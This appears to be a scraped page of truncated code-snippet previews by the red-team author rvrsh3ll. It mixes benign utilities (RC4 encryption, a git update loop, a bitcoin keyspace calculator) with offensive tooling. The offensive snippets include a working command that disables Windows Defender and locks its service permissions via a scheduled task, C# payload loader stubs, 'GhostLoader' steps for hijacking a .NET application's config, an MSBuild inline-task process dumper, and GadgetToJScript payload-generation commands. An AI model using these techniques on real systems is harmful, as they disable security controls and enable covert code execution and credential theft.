rvrsh3ll

public class RC4 {

  public static byte[] Encrypt(byte[] pwd, byte[] data) {
    int a, i, j, k, tmp;
    int[] key, box;
    byte[] cipher;

    key = new int[256];
    box = new int[256];
    cipher = new byte[data.Length];

rvrsh3ll

#!/bin/bash

# store the current dir
CUR_DIR=$(pwd)

# Let the person running the script know what's going on.
echo "\n\033[1mPulling in latest changes for all repositories...\033[0m\n"

# Find all git repositories and update it to the master latest revision
for i in $(find . -name ".git" | cut -c 3-); do

rvrsh3ll

Function Calculate-BitcoinKeySpaceBrute() {
    <#
    .SYNOPSIS
        Calculate the number of days to brute force a keyspace with BitCrack given an amount of keys per second "mkeys". 
        May be used to calculate time to crack bitcoin puzzle 32 https://privatekeys.pw/puzzles/bitcoin-puzzle-tx
        Bitcrack: https://github.com/brichard19/BitCrack
        Author: Steve Borosh (@rvrsh3ll)        
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None

rvrsh3ll

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

rvrsh3ll

using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;

    public class Payload
    {

rvrsh3ll

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

rvrsh3ll

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
  <!-- Feel free to use a more aggressive class for testing. -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"

rvrsh3ll

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()

rvrsh3ll

Param([parameter(Mandatory=$true,
   HelpMessage="Directory to search for .NET Assemblies in.")]
   $Directory,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to search recursively.")]
   [switch]$Recurse = $false,
   [parameter(Mandatory=$false,
   HelpMessage="Whether or not to include DLLs in the search.")]
   [switch]$DLLs = $false,
   [parameter(Mandatory=$false,

rvrsh3ll

# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta

# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js

# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs

# Command to generate VBA code using GadgetsToJScript